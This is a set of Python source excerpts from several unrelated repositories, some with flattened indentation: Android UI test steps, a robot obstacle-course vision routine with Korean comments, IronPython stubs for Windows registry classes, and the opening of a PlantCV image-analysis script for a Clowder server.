            ui_steps.scroll_up_to_view(view_to_check = "Bluetooth")()
        tags:
            ui, android, swipe, scroll
    """

    def __init__(self, view_to_check, sx=300, sy=300, ex=300, ey=400, iterations=10, **kwargs):
        self.start_x = sx
        self.start_y = sy
        self.end_x = ex
        self.end_y = ey
        self.view_to_check = view_to_check
        self.iterations = iterations
        ui_step.__init__(self, **kwargs)

    def do(self):
        # Swipe at most `iterations` times, stopping as soon as the target
        # view becomes visible.
        for _ in range(self.iterations):
            if self.uidevice(**self.view_to_check).wait.exists(timeout=1000):
                break
            swipe(serial=self.serial,
                  sx=self.start_x, sy=self.start_y,
                  ex=self.end_x, ey=self.end_y,
                  steps=10)()

    def check_condition(self):
        # The step passes only if the target view is visible at the end.
        return self.uidevice(**self.view_to_check).wait.exists(timeout=1000)
class swipe(ui_step):
    """ description:
            swipes from (<sx>, <sy>) to (<ex>, <ey>)
            in <steps> steps
            if <view_to_check> given it will check that
            the object identified by <view_to_check>:
            - appeared if <view_presence> is True
            - disappeared if <view_presence> is False after swipe
        usage:
            ui_steps.swipe(sx = 10, sy = 10, ex = 100, ey = 100)
        tags:
            ui, android, swipe
    """

    def __init__(self, sx, sy, ex, ey, steps=100, view_presence=True,
                 exists=True, view_to_check=None, wait_time=None, iterations=1, **kwargs):
        ui_step.__init__(self, **kwargs)
        self.view_presence = view_presence
        self.wait_time = wait_time
        self.start_x = sx
        self.start_y = sy
        self.end_x = ex
        self.end_y = ey
        self.steps = steps
        self.exists = exists
        self.view_to_check = view_to_check
        self.iterations = iterations

    def _do_swipe(self):
        # One raw swipe gesture with the configured geometry.
        self.uidevice.swipe(self.start_x, self.start_y,
                            self.end_x, self.end_y, self.steps)

    def do(self):
        if not self.view_to_check:
            # No target view: perform a single unconditional swipe.
            self._do_swipe()
            return
        # Swipe up to `iterations` times, skipping the gesture whenever the
        # target view is already visible.
        for _ in range(self.iterations):
            if not self.uidevice(**self.view_to_check).wait.exists(timeout=1000):
                self._do_swipe()

    def check_condition(self):
        if self.view_to_check is None:
            return True
        # Optional longer settle-wait before the final visibility probe.
        if self.wait_time:
            selector = self.uidevice(**self.view_to_check)
            if self.exists:
                selector.wait.exists(timeout=self.wait_time)
            else:
                selector.wait.gone(timeout=self.wait_time)
        appeared = self.uidevice(**self.view_to_check).wait.exists(timeout=1000)
        if self.view_presence:
            return appeared
        return not appeared
class click_switch(ui_step):
    """ description:
            changes switch state to argument state value
            if already in the desired state do nothing
            else clicks the switch and change switched member to
            True
        usage:
            ui_steps.click_switch(
                view_to_find = {"className": "android.widget.Switch",
                                "instance": "1"},
                state = "ON",
                click_to_close_popup = {"text": "Agree"})()
        tags:
            ui, android, click, switch, enable, disable
    """
    # Class-level defaults, overwritten per instance in __init__.
    view_to_find = None
    state = None
    switch = None

    def __init__(self, view_to_find, state="ON", click_to_close_popup=None,
                 right_of=False, wait_time=3000, **kwargs):
        ui_step.__init__(self, **kwargs)
        self.view_to_find = view_to_find
        self.state = state
        self.switch = None
        self.step_data = False
        self.click_to_close_popup = click_to_close_popup
        self.right_of = right_of
        self.wait_time = wait_time
        self.set_passm(
            "Set switch {0} to {1}".format(view_to_find, self.state))
        self.set_errorm(
            "", "Could not set switch {0} to {1}".format(view_to_find, self.state))

    def do(self):
        wait_for_view(view_to_find=self.view_to_find,
                      serial=self.serial)()
        if self.right_of:
            # The selector points at a label; the actual switch widget sits
            # to its right.
            self.switch = self.uidevice(**self.view_to_find).right(
                className="android.widget.Switch")
        else:
            self.switch = self.uidevice(**self.view_to_find)
        if self.switch.info['text'] == self.state:
            # Already in the requested state; nothing was clicked.
            self.step_data = False
        else:
            self.switch.click.wait()
            self.step_data = True
            if self.click_to_close_popup:
                click_button(serial=self.serial,
                             print_error="Failed to close popup",
                             blocking=True,
                             view_to_find=self.click_to_close_popup)()

    def check_condition(self):
        if self.right_of:
            self.switch = self.uidevice(**self.view_to_find).right(
                className="android.widget.Switch", text=self.state).\
                wait.exists(timeout=self.wait_time)
        else:
            # Fixed: the original called self.view_to_find.update(...), which
            # mutated the caller's selector dict in place and leaked a "text"
            # key into any later reuse of that dict. Use a merged copy.
            selector = dict(self.view_to_find)
            selector["text"] = self.state
            self.switch = self.uidevice(
                **selector).wait.exists(timeout=self.wait_time)
        return self.switch
@devicedecorator
class press_all_apps():
    """ description:
            opens all application activity
        usage:
            ui_steps.press_all_apps()
        tags:
            ui, android, press, click, allapps, applications
    """
    # Placeholder body: implementation supplied per-device by @devicedecorator.
    pass
@devicedecorator
class press_home():
    """ description:
            opens home page
        usage:
            ui_steps.press_home()
        tags:
            ui, android, press, click, home, homepage
    """
    # Placeholder body: implementation supplied per-device by @devicedecorator.
    pass
@devicedecorator
class press_bell(ui_step):
    """ description:
            Open bell icon (Notification in android P)
        usage:
            ui_steps.press_bell(serial=serial)()
        tags:
            ui, android, press, click, quick setting, bell
    """
    # NOTE(review): unlike the other @devicedecorator placeholders in this
    # file, this class inherits ui_step directly — confirm that is intended.
    pass
class press_back(ui_step):
""" description:
presses the back button. If <view_to_check> is passed it will check
if that view exists
usage:
ui_steps.press_back(view_to_check = {"text": "Bluetooth"})
tags:
ui, android, press, back
"""
| |
# Repo: KangJuSeong/FIRA_RoboWorldCup
import cv2
import numpy as np
import time
import datetime
from library.motion import Motion
from library.image_processor import ImageProcessor
from library.motion import Motion
"""
#----알고리즘----#
# 노랑 or 파랑, 빨강 장애물이 나올 때 까지 걷기 /멈추기: thread walk
# 노랑 or 파랑 장애물
# 5걸음 앞으로
# 밑에 보고 영상 저장, 왼쪽, 오른쪽 체크해서 방향 정함
# 왼쪽, 오른쪽 둘다 선 없으면 밑에보고 저장한 영상으로 더 효율적인 방향 정하기
# escape roi 영상에 장애물 없으면 theadwalk로 다시 가기
#빨강색 장애물
# 빨강색을 센터로
# 앞에 보고 양옆에 파랑색 안보이는지
# 기어감
# theadwalk로 다시 가기
#----동작----#
# 앞으로 걷기
# move 오른쪽
# move 왼쪽
# 고개 - 오블리큐, 업, 왼, 오
"""
# =========================================#
# 1. obs_0_1_check_obstacle_front()
#    - with the head oblique, check for yellow/blue obstacles ahead
#      (covers the blind spot of the "up" head position)
#
# 2. obs_0_2_walk_until_obstacle()
#    - walk until a yellow/blue or red obstacle appears, then stop
#      | yellow_blue_ratio: yellow-or-blue obstacle threshold
#      | red_ratio: red obstacle threshold
#    - red found: walk 6 steps
#    - yellow or blue found: walk 2 steps
#
# 3. obs_1_1_choose_direction()
#    - decide which side to dodge the obstacle to
#      | roiL: left region used to detect the yellow line
#      | roiR: right region used to detect the yellow line
#    - refresh the "down" frame
#      | 1) go toward the side without a yellow line
#      | 2) if neither side has one, use the "down" frame and pick the
#           left/right roi with the lower color ratio
#      | 3) if both have one, pick the side with the lower ratio
#
# 4. obs_1_3_escape_and_check_obstacle()
#    - refresh the "down" frame
#      | roi_E: area the robot can walk straight through without hitting
#        the obstacle
#    - if roi_E is clear, finish dodging the obstacle
#      | look toward the side opposite the dodge and refresh the frame
#      | side_blue_ratio: blue color threshold
#      | if the obstacle is still right beside the robot, sidestep further
#    - check whether red is close
#
# 5. obs_3_1_check_red_center_blue_side()
#    - center the red obstacle
#      | compare red ratios of the two outer thirds of the frame
#      | if the difference is under 40 percent, move forward while
#        checking red proximity
#    - check for blue obstacles on both sides
#      | roi_L: left blue-obstacle check region
#      | roi_R: right blue-obstacle check region
# 6. obs_4_1_crawl()
#    - crawl under the obstacle
# =========================================#
class ObstacleRun:
    def __init__(self, robot, ip):
        """Store the robot/vision handles and precompute all ROI boundaries.

        Args:
            robot: motion controller (walking thread, crawl, head moves).
            ip: ImageProcessor providing frames plus width/height.
        """
        # imageProcessor
        self.robot = robot
        self.ip = ip
        # local state
        self.mission_finished = 0
        self.case = 0
        self.red_after_blue = 0  # crawl 4 fewer times when red follows a blue obstacle
        # self.red_finished = 0  # only one red obstacle on the course
        # color-ratio thresholds
        self.yellow_blue_ratio = 3
        self.red_ratio = 70
        self.red_up_ratio = 62  # are we close enough to the red obstacle
        self.side_blue_yellow_ratio = 10  # has the obstacle been fully avoided
        self.blue_ratio_before_crawl = 60  # blue on the sides before lying down for red
        self.now = datetime.datetime.now().strftime("day:%d h:%H m:%M s:%S")
        # roi1: yellow/blue obstacles; two variants: front, thread
        #   front: roughly 28-50 cm ahead
        #   thread: 50+ cm ahead
        self.roi1_x_start = int(self.ip.width // 6.5)
        self.roi1_x_end = self.ip.width - int(self.ip.width // 6.5)
        self.roi1_y_start_front = self.ip.height - int(self.ip.height // 3.5)
        self.roi1_y_start_thread = self.ip.height - int(self.ip.height // 4.3)
        self.roi1_y_end = self.ip.height
        # roi2: red obstacle search area
        self.roi2_x_start = 0
        self.roi2_x_end = self.ip.width
        self.roi2_y_start = 0
        self.roi2_y_end = int(self.ip.height // 5.3)
        # roiL: bottom-left corner
        self.roiL_x_start = 0
        self.roiL_x_end = 3 * int(self.ip.width // 4)
        self.roiL_y_start = self.ip.height - int(self.ip.height // 3)
        self.roiL_y_end = self.ip.height
        # roiR: bottom-right corner
        self.roiR_x_start = int(self.ip.width // 4)
        self.roiR_x_end = self.ip.width
        self.roiR_y_start = self.ip.height - int(self.ip.height // 3)
        self.roiR_y_end = self.ip.height
        # escape roi: is it safe to walk straight ahead
        self.roiE_x_start = int(self.ip.width // 4.4)
        self.roiE_x_end = self.ip.width - int(self.ip.width // 4.4)
        self.roiE_y_start = int(self.ip.height * 0.65)
        self.roiE_y_end = self.ip.height
        # roiS_L: left side roi — before crawling under red / after dodging a
        # yellow-blue obstacle, check the side for remaining obstacle
        self.roiS_L_x_start = int(self.ip.width // 5)
        self.roiS_L_x_end = 2 * int(self.ip.width // 5)
        self.roiS_L_y_start = 0
        self.roiS_L_y_end = 2 * int(self.ip.height // 3)
        # roiS_R: right side roi — same purpose as roiS_L
        self.roiS_R_x_start = 3 * int(self.ip.width // 5)
        self.roiS_R_x_end = 4 * int(self.ip.width // 5)
        self.roiS_R_y_start = 0
        self.roiS_R_y_end = 2 * int(self.ip.height // 3)
    def run(self):
        """Main mission loop: a small state machine driven by self.case.

        case 0: walk until a yellow/blue or red obstacle appears
        case 1: yellow/blue obstacle -> pick a side and dodge
        case 2: dodge finished -> back to case 0
        case 3: red obstacle -> center on it and check the sides
        case 4: crawl under the red obstacle, then stand up
        case 5: back to case 0
        """
        while not self.mission_finished:
            self.ip.clear()
            # Walk until a yellow/blue or red obstacle shows up, then stop.
            if self.case == 0:
                self.set_head("oblique")
                time.sleep(0.3)
                is_obstacle = self.obs_0_1_check_obstacle_front()
                if is_obstacle:
                    self.case = 1
                else:
                    self.set_head("up")
                    time.sleep(0.3)
                    self.case += self.obs_0_2_walk_until_obstacle()  # returns 1 or 3
            elif self.case == 1:
                # Yellow or blue obstacle ahead: choose a dodge direction.
                self.set_head("down")
                time.sleep(0.3)
                self.ip.clear()
                frame = self.ip.getFrame()
                direction = self.obs_1_1_choose_direction(frame)  # returns 2 or 3
                self.obs_1_2_move(direction)
                self.set_head("down")
                time.sleep(0.3)
                self.case += self.obs_1_3_escape_and_check_obstacle(direction)
            elif self.case == 2:
                # Dodge finished: go back to case 0.
                self.case = 0
            elif self.case == 3:
                # Red obstacle: center on it first.
                self.case += self.obs_3_1_check_red_center_blue_side()
            elif self.case == 4:
                # Crawl under the bar, then stand back up.
                self.case += self.obs_4_1_crawl()
                # self.red_finished = 1  # there is only one red obstacle
            elif self.case == 5:
                # Go back to case 0.
                self.case = 0
def obs_0_1_check_obstacle_front(self):
# print("check_obstacle_front 함수 호출")
yellow_blue_obstacle_flag = 0
self.ip.clear()
frame = self.ip.getFrame()
success = 0
for i in range(2):
self.ip.clear()
frame = self.ip.getFrame()
# roi_1: 로봇이 직진할 떄 장애물에 부딪히지 않고 갈 수 있는 시야영역
roi_1 = frame[int(self.roi1_y_start_front):int(self.roi1_y_end), int(self.roi1_x_start):int(self.roi1_x_end)]
yellow_blue_bin = self.get_yellow_blue_bin(roi_1)
# cv2.imshow("bin", yellow_blue_bin)
# roi_1 영역에 노랑, 파랑 장애물 유무 판단
if self.ip.check_color_ratio_bin(yellow_blue_bin, self.yellow_blue_ratio):
success += 1
if success > 1:
yellow_blue_obstacle_flag = 1
# cv2.imwrite(str(self.now) + "yell_blue_obstacle.png", frame)
break
# 디버깅 용 출력 화면
# cv2.rectangle(frame, (self.roi1_x_start, self.roi1_y_start_front), (self.roi1_x_end, self.roi1_y_end), (0, 0, 255), 1)
# cv2.imshow("test", frame)
# cv2.imwrite(str(self.now) + "front", frame)
# cv2.waitKey(1)
###############################################
if yellow_blue_obstacle_flag:
# print("check_obstacle_front: 앞에 노랑, 파랑색 장애물 있음")
# cv2.imwrite(str(self.now) + "front.png", frame)
return True
else:
# print("check_obstacle_front: 없음")
return False
    def obs_0_2_walk_until_obstacle(self):
        """Walk forward (threaded gait) until an obstacle is detected.

        Polls frames in a loop and stops the walking thread when either a
        yellow/blue obstacle enters roi_1 or red fills roi_2 beyond its
        threshold.

        Returns:
            int: 1 for a yellow/blue obstacle (state machine -> case 1),
                 3 for a red obstacle (state machine -> case 3).
        """
        yellow_blue_obstacle_flag = 0
        red_obstacle_flag = 0
        self.robot.ob_startThread()
        while True:
            self.ip.clear()
            frame = self.ip.getFrame()
            # roi_1: walking corridor. The head is "up" here, so the roi is
            # vertically shorter than in the "oblique" check.
            roi_1 = frame[self.roi1_y_start_thread:self.roi1_y_end, self.roi1_x_start:self.roi1_x_end]
            # roi_2: red-obstacle search area.
            roi_2 = frame[self.roi2_y_start:self.roi2_y_end, self.roi2_x_start:self.roi2_x_end]
            # Yellow/blue obstacle inside roi_1?
            yellow_blue_bin = self.get_yellow_blue_bin(roi_1)
            if self.ip.check_how_much_color_ratio_bin(yellow_blue_bin) > self.yellow_blue_ratio:
                self.robot.ob_stopThread()
                yellow_blue_obstacle_flag = 1
            # Red obstacle inside roi_2?
            if self.ip.check_how_much_color_ratio(roi_2, "RED") > self.red_ratio:
                self.robot.ob_stopThread()
                red_obstacle_flag = 1
            if yellow_blue_obstacle_flag:
                # Seen with the head up, so the obstacle is still fairly far
                # away: take a few more steps before switching state.
                self.robot.ob_walk(3)
                time.sleep(0.3)
                return 1
            elif red_obstacle_flag:
                time.sleep(0.3)
                self.robot.ob_walk(3)
                # Approach until red is close enough before returning.
                self.check_red_near("thread")
                return 3
            else:
                # No obstacle yet; keep walking and polling.
                pass
def obs_1_1_choose_direction(self, frame):
y_start = int((self.ip.height * 0.75) // 3)
self.set_head("left") # 왼쪽 방향 보기
time.sleep(0.3)
self.ip.clear()
left_img = self.ip.getFrame()
# cv2.rectangle(left_img, (self.roiL_x_start, self.roiL_y_start), (self.roiL_x_end, self.roiL_y_end), (0, 0, 255), 2)
# cv2.imshow("test", left_img)
# cv2.imwrite(str(self.now) + "left.png", left_img)
left_img = left_img[self.roiL_y_start:self.roiL_y_end, self.roiL_x_start:self.roiL_x_end]
left_ratio = self.ip.check_how_much_color_ratio(left_img, "YELLOW")
self.set_head("right") # 오른쪽 방향 보기
time.sleep(0.3)
self.ip.clear()
right_img = self.ip.getFrame()
# cv2.rectangle(right_img, (self.roiR_x_start, self.roiR_y_start), (self.roiR_x_end, self.roiR_y_end), (0, 0, 255), 2)
# cv2.imshow("test", right_img)
# cv2.imwrite(str(self.now) + "right.png", right_img)
right_img = right_img[self.roiR_y_start:self.roiR_y_end, self.roiR_x_start:self.roiR_x_end]
right_ratio = self.ip.check_how_much_color_ratio(right_img, "YELLOW")
# self.set_head("down")
# print("choose_direction 왼쪽 노랑 비율: ", left_ratio)
# print("choose_direction 오른쪽 노랑 비율: ", right_ratio)
# left: 2, right: 3
if left_ratio > 2 and right_ratio < 1:
# 노랑이 왼쪽 o, 오른쪽 x
# print("choose_direction: 노랑이 왼쪽 o, 오른쪽 x")
return 3
elif left_ratio < 1 and right_ratio > 2:
# 노랑이 왼쪽 x, 오른쪽 o
# print("choose_direction: 노랑이 왼쪽 x, 오른쪽 o")
return 2
elif left_ratio < 1 and right_ratio < 1:
# print("choose_direction: roi 3등분 해서 장애물 없는 쪽으로")
roi_1_L = frame[int(self.ip.height // 2):self.roi1_y_end, 0:int(self.ip.width // 4)]
roi_1_R = frame[int(self.ip.height // 2):self.roi1_y_end,
self.ip.width - int(self.ip.width // 4):self.ip.width]
roi_1_L = self.get_yellow_blue_bin(roi_1_L)
roi_1_R = self.get_yellow_blue_bin(roi_1_R)
# print("choose_direction roi 왼쪽 노랑, 파랑 비율: ", self.ip.check_how_much_color_ratio_bin(roi_1_L))
# print("choose_direction roi 오른쪽 노랑, 파랑 비율: ", self.ip.check_how_much_color_ratio_bin(roi_1_R))
if abs(self.ip.check_how_much_color_ratio_bin(roi_1_L) - self.ip.check_how_much_color_ratio_bin(
roi_1_R)) < 5:
return 2
elif self.ip.check_how_much_color_ratio_bin(roi_1_L) < self.ip.check_how_much_color_ratio_bin(roi_1_R):
return | |
the Microsoft.Win32.RegistryHive enumeration.
machineName: The remote machine.
Returns: The requested registry key.
"""
pass
    def OpenSubKey(self,name,*__args):
        # Auto-generated .NET interop stub: the real implementation lives in
        # the CLR; this body exists only so tooling can see the signature.
        """
        OpenSubKey(self: RegistryKey,name: str,permissionCheck: RegistryKeyPermissionCheck,rights: RegistryRights) -> RegistryKey
        Retrieves the specified subkey for read or read/write access,requesting the
        specified access rights.
        name: The name or path of the subkey to create or open.
        permissionCheck: One of the enumeration values that specifies whether the key is opened for read
        or read/write access.
        rights: A bitwise combination of enumeration values that specifies the desired security
        access.
        Returns: The subkey requested,or null if the operation failed.

        OpenSubKey(self: RegistryKey,name: str) -> RegistryKey
        Retrieves a subkey as read-only.
        name: The name or path of the subkey to open as read-only.
        Returns: The subkey requested,or null if the operation failed.

        OpenSubKey(self: RegistryKey,name: str,rights: RegistryRights) -> RegistryKey

        OpenSubKey(self: RegistryKey,name: str,writable: bool) -> RegistryKey
        Retrieves a specified subkey,and specifies whether write access is to be
        applied to the key.
        name: Name or path of the subkey to open.
        writable: Set to true if you need write access to the key.
        Returns: The subkey requested,or null if the operation failed.

        OpenSubKey(self: RegistryKey,name: str,permissionCheck: RegistryKeyPermissionCheck) -> RegistryKey
        Retrieves the specified subkey for read or read/write access.
        name: The name or path of the subkey to create or open.
        permissionCheck: One of the enumeration values that specifies whether the key is opened for read
        or read/write access.
        Returns: The subkey requested,or null if the operation failed.
        """
        pass
    def SetAccessControl(self,registrySecurity):
        # Auto-generated .NET interop stub; implemented by the CLR.
        """
        SetAccessControl(self: RegistryKey,registrySecurity: RegistrySecurity)
        Applies Windows access control security to an existing registry key.
        registrySecurity: The access control security to apply to the current subkey.
        """
        pass
    def SetValue(self,name,value,valueKind=None):
        # Auto-generated .NET interop stub; implemented by the CLR.
        """
        SetValue(self: RegistryKey,name: str,value: object,valueKind: RegistryValueKind)
        Sets the value of a name/value pair in the registry key,using the specified
        registry data type.
        name: The name of the value to be stored.
        value: The data to be stored.
        valueKind: The registry data type to use when storing the data.

        SetValue(self: RegistryKey,name: str,value: object)
        Sets the specified name/value pair.
        name: The name of the value to store.
        value: The data to be stored.
        """
        pass
    def ToString(self):
        # Auto-generated .NET interop stub; implemented by the CLR.
        """
        ToString(self: RegistryKey) -> str
        Retrieves a string representation of this key.
        Returns: A string representing the key. If the specified key is invalid (cannot be
        found) then null is returned.
        """
        pass
    def __enter__(self,*args):
        # Context-manager entry (IDisposable support); implemented by the CLR.
        """ __enter__(self: IDisposable) -> object """
        pass
    def __exit__(self,*args):
        # Context-manager exit: disposes the key (IDisposable); CLR-implemented.
        """ __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
        pass
    def __init__(self,*args):
        # Auto-generated stub constructor placeholder.
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass
    def __str__(self,*args):
        # Auto-generated stub; string conversion is handled by the CLR.
        pass
Handle=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a Microsoft.Win32.SafeHandles.SafeRegistryHandle object that represents the registry key that the current Microsoft.Win32.RegistryKey object encapsulates.
Get: Handle(self: RegistryKey) -> SafeRegistryHandle
"""
Name=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Retrieves the name of the key.
Get: Name(self: RegistryKey) -> str
"""
SubKeyCount=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Retrieves the count of subkeys of the current key.
Get: SubKeyCount(self: RegistryKey) -> int
"""
ValueCount=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Retrieves the count of values in the key.
Get: ValueCount(self: RegistryKey) -> int
"""
View=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the view that was used to create the registry key.
Get: View(self: RegistryKey) -> RegistryView
"""
class RegistryKeyPermissionCheck(Enum,IComparable,IFormattable,IConvertible):
    """
    Specifies whether security checks are performed when opening registry keys and accessing their name/value pairs.
    enum RegistryKeyPermissionCheck,values: Default (0),ReadSubTree (1),ReadWriteSubTree (2)
    """
    # Auto-generated IronPython/.NET interop stub: dunder bodies are
    # placeholders and the member values are populated by the CLR at runtime.
    def __eq__(self,*args):
        """ x.__eq__(y) <==> x==y """
        pass
    def __format__(self,*args):
        """ __format__(formattable: IFormattable,format: str) -> str """
        pass
    def __ge__(self,*args):
        pass
    def __gt__(self,*args):
        pass
    def __init__(self,*args):
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass
    def __le__(self,*args):
        pass
    def __lt__(self,*args):
        pass
    def __ne__(self,*args):
        pass
    def __reduce_ex__(self,*args):
        pass
    def __str__(self,*args):
        pass
    # Enum member placeholders (actual values listed in the class docstring).
    Default=None
    ReadSubTree=None
    ReadWriteSubTree=None
    value__=None
class RegistryOptions(Enum,IComparable,IFormattable,IConvertible):
    """
    Specifies options to use when creating a registry key.
    enum (flags) RegistryOptions,values: None (0),Volatile (1)
    """
    # Auto-generated IronPython/.NET interop stub: dunder bodies are
    # placeholders and the member values are populated by the CLR at runtime.
    def __eq__(self,*args):
        """ x.__eq__(y) <==> x==y """
        pass
    def __format__(self,*args):
        """ __format__(formattable: IFormattable,format: str) -> str """
        pass
    def __ge__(self,*args):
        pass
    def __gt__(self,*args):
        pass
    def __init__(self,*args):
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass
    def __le__(self,*args):
        pass
    def __lt__(self,*args):
        pass
    def __ne__(self,*args):
        pass
    def __reduce_ex__(self,*args):
        pass
    def __str__(self,*args):
        pass
    # Enum member placeholders. NOTE(review): assigning to the name "None"
    # below is a SyntaxError in CPython; this generated stub is only meant
    # for IronPython tooling — confirm it is never imported by CPython.
    None=None
    value__=None
    Volatile=None
class RegistryValueKind(Enum,IComparable,IFormattable,IConvertible):
    """
    Specifies the data types to use when storing values in the registry,or identifies the data type of a value in the registry.
    enum RegistryValueKind,values: Binary (3),DWord (4),ExpandString (2),MultiString (7),None (-1),QWord (11),String (1),Unknown (0)
    """
    # Auto-generated IronPython/.NET interop stub: dunder bodies are
    # placeholders and the member values are populated by the CLR at runtime.
    def __eq__(self,*args):
        """ x.__eq__(y) <==> x==y """
        pass
    def __format__(self,*args):
        """ __format__(formattable: IFormattable,format: str) -> str """
        pass
    def __ge__(self,*args):
        pass
    def __gt__(self,*args):
        pass
    def __init__(self,*args):
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass
    def __le__(self,*args):
        pass
    def __lt__(self,*args):
        pass
    def __ne__(self,*args):
        pass
    def __reduce_ex__(self,*args):
        pass
    def __str__(self,*args):
        pass
    # Enum member placeholders. NOTE(review): the "None=None" line below is a
    # SyntaxError in CPython; valid only for IronPython stub tooling — confirm.
    Binary=None
    DWord=None
    ExpandString=None
    MultiString=None
    None=None
    QWord=None
    String=None
    Unknown=None
    value__=None
class RegistryValueOptions(Enum,IComparable,IFormattable,IConvertible):
    """
    Specifies optional behavior when retrieving name/value pairs from a registry key.
    enum (flags) RegistryValueOptions,values: DoNotExpandEnvironmentNames (1),None (0)
    """
    # Auto-generated IronPython/.NET interop stub: dunder bodies are
    # placeholders and the member values are populated by the CLR at runtime.
    def __eq__(self,*args):
        """ x.__eq__(y) <==> x==y """
        pass
    def __format__(self,*args):
        """ __format__(formattable: IFormattable,format: str) -> str """
        pass
    def __ge__(self,*args):
        pass
    def __gt__(self,*args):
        pass
    def __init__(self,*args):
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass
    def __le__(self,*args):
        pass
    def __lt__(self,*args):
        pass
    def __ne__(self,*args):
        pass
    def __reduce_ex__(self,*args):
        pass
    def __str__(self,*args):
        pass
    # Enum member placeholders. NOTE(review): "None=None" is a SyntaxError in
    # CPython; valid only for IronPython stub tooling — confirm.
    DoNotExpandEnvironmentNames=None
    None=None
    value__=None
class RegistryView(Enum,IComparable,IFormattable,IConvertible):
    """
    Specifies which registry view to target on a 64-bit operating system.
    enum RegistryView,values: Default (0),Registry32 (512),Registry64 (256)
    """
    # Auto-generated IronPython/.NET interop stub: dunder bodies are
    # placeholders and the member values are populated by the CLR at runtime.
    def __eq__(self,*args):
        """ x.__eq__(y) <==> x==y """
        pass
    def __format__(self,*args):
        """ __format__(formattable: IFormattable,format: str) -> str """
        pass
    def __ge__(self,*args):
        pass
    def __gt__(self,*args):
        pass
    def __init__(self,*args):
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass
    def __le__(self,*args):
        pass
    def __lt__(self,*args):
        pass
    def __ne__(self,*args):
        pass
    def __reduce_ex__(self,*args):
        pass
    def __str__(self,*args):
        pass
    # Enum member placeholders (actual values listed in the class docstring).
    Default=None
    Registry32=None
    Registry64=None
    value__=None
class SaveFileDialog(FileDialog):
    """
    Represents a common dialog that allows the user to specify a filename to save a file as. Microsoft.Win32.SaveFileDialog cannot be used by an application that is executing under partial trust.
    SaveFileDialog()
    """
    # Auto-generated .NET interop stub: method bodies are placeholders and the
    # real implementation lives in the CLR.
    def OpenFile(self):
        """
        OpenFile(self: SaveFileDialog) -> Stream
        Creates a read-write file stream for the filename selected by the user using
        Microsoft.Win32.SaveFileDialog.
        Returns: A new System.IO.Stream that contains the selected file.
        """
        pass
    def Reset(self):
        """
        Reset(self: SaveFileDialog)
        Resets all Microsoft.Win32.SaveFileDialog properties to their default values.
        """
        pass
    # Property placeholders; accessors are provided by the CLR.
    CreatePrompt=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Gets or sets a value indicating whether Microsoft.Win32.SaveFileDialog prompts the user for permission to create a file if the user specifies a file that does not exist.
    Get: CreatePrompt(self: SaveFileDialog) -> bool
    Set: CreatePrompt(self: SaveFileDialog)=value
    """
    Options=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Gets the Win32 common file dialog flags that are used by file dialogs for initialization.
    """
    OverwritePrompt=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Gets or sets a value indicating whether Microsoft.Win32.SaveFileDialog displays a warning if the user specifies the name of a file that already exists.
    Get: OverwritePrompt(self: SaveFileDialog) -> bool
    Set: OverwritePrompt(self: SaveFileDialog)=value
    """
class SessionEndedEventArgs(EventArgs):
    """
    Provides data for the Microsoft.Win32.SystemEvents.SessionEnded event.
    SessionEndedEventArgs(reason: SessionEndReasons)
    """
    # Auto-generated .NET interop stub. NOTE(review): the @staticmethod on
    # __new__ is redundant in standard Python (generated artifact).
    @staticmethod
    def __new__(self,reason):
        """ __new__(cls: type,reason: SessionEndReasons) """
        pass
    Reason=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Gets an identifier that indicates how the session ended.
    Get: Reason(self: SessionEndedEventArgs) -> SessionEndReasons
    """
class SessionEndedEventHandler(MulticastDelegate,ICloneable,ISerializable):
"""
Represents the method that will handle the Microsoft.Win32.SystemEvents.SessionEnded event.
SessionEndedEventHandler(object: object,method: IntPtr)
"""
def BeginInvoke(self,sender,e,callback,object):
""" BeginInvoke(self: SessionEndedEventHandler,sender: object,e: SessionEndedEventArgs,callback: AsyncCallback,object: object) -> IAsyncResult """
| |
# Repo: julianpistorius/computing-pipeline
#!/usr/bin/env python
from __future__ import print_function
import sys
import os
import argparse
import requests
import json
import posixpath
import cv2
import numpy as np
import plantcv as pcv
# Parse command-line arguments
###########################################
def options():
    """Parse and return command line options.

    Returns:
        argparse.Namespace with dataset, url, username, and password.
    """
    # NOTE: earlier revisions accepted per-image arguments (--vis, --nir,
    # --perspective) plus existence checks; the script now discovers images
    # through the Clowder dataset instead.
    parser = argparse.ArgumentParser(
        description="PlantCV Clowder image analysis script for the DDPSC indoor system.",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
    )
    parser.add_argument("-d", "--dataset", required=True, help="Clowder Dataset key.")
    parser.add_argument("-u", "--url", required=True, help="Clowder URL.")
    parser.add_argument("-U", "--username", required=True, help="Clowder username.")
    parser.add_argument("-p", "--password", required=True, help="Clowder password.")
    return parser.parse_args()
###########################################
# Main
###########################################
def main():
    """Main program.

    Authenticates to Clowder, indexes the dataset's image metadata by
    camera type / perspective / rotation angle, runs the PlantCV
    side-view or top-view pipeline on each VIS image paired with its
    matching NIR image, then uploads a one-row CSV traits table back
    to the dataset.

    Raises:
        RuntimeError: if a VIS image has no matching NIR image.
    """
    # Get options
    args = options()

    # Create new session; auth is reused by every subsequent request
    sess = requests.Session()
    sess.auth = (args.username, args.password)

    # Get list of files in dataset
    filelist = clowder_dataset_filelist(sess, args.url, args.dataset)

    # Build metadata set
    metadata = get_metadata(sess, args.url, filelist)
    (fields, traits) = get_traits_table()

    # Process images with PlantCV
    for perspective in metadata['visible/RGB'].keys():
        for rotation_angle in metadata['visible/RGB'][perspective].keys():
            img_meta = metadata['visible/RGB'][perspective][rotation_angle]
            # VIS/RGB image Clowder ID
            vis_id = img_meta['img_id']
            # Look for an NIR image with the same camera perspective and
